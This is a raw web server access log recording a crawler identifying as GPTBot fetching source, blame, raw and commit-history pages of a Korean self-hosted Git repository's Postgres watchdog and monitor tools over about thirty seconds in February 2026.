"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" -[17/Feb/2026:13:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" [Client 74.7.227.38] [Length 11645] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" -[17/Feb/2026:13:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" [Client 74.7.227.38] [Length 10951] [Gzip 4.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" -[17/Feb/2026:13:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11853] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" -[17/Feb/2026:13:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:13:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 10859] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:13:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist" [Client 74.7.227.38] [Length 9989] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 12375] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" -[17/Feb/2026:13:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12242] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" -[17/Feb/2026:13:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 11089] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10973] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" -[17/Feb/2026:13:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 12281] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 10855] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" [Client 74.7.227.38] [Length 10708] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 378859] [Gzip 29.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:13:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 252268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:13:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist" -[17/Feb/2026:13:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 783] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" -[17/Feb/2026:13:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist" [Client 74.7.227.38] [Length 10128] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist" -[17/Feb/2026:13:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10200] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build" [Client 74.7.227.38] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 9900] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" -[17/Feb/2026:13:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 10114] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" -[17/Feb/2026:13:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build" [Client 74.7.227.38] [Length 9843] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:13:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" -[17/Feb/2026:13:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 75] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" -[17/Feb/2026:13:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 11698] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" -[17/Feb/2026:13:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11782] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10412] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10429] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 9468] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" -[17/Feb/2026:13:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build" [Client 74.7.227.38] [Length 10384] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build" -[17/Feb/2026:13:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 9902] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:13:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" -[17/Feb/2026:13:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build" -[17/Feb/2026:13:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:13:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 10963685] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" -[17/Feb/2026:13:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 11455] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:13:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" [Client 74.7.227.38] [Length 9901] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:13:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:13:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" [Client 74.7.227.38] [Length 10386] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:13:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 63765] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:13:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 118018] [Gzip 19.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:13:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:13:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10930] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10997] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 10856] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:13:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 10849] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 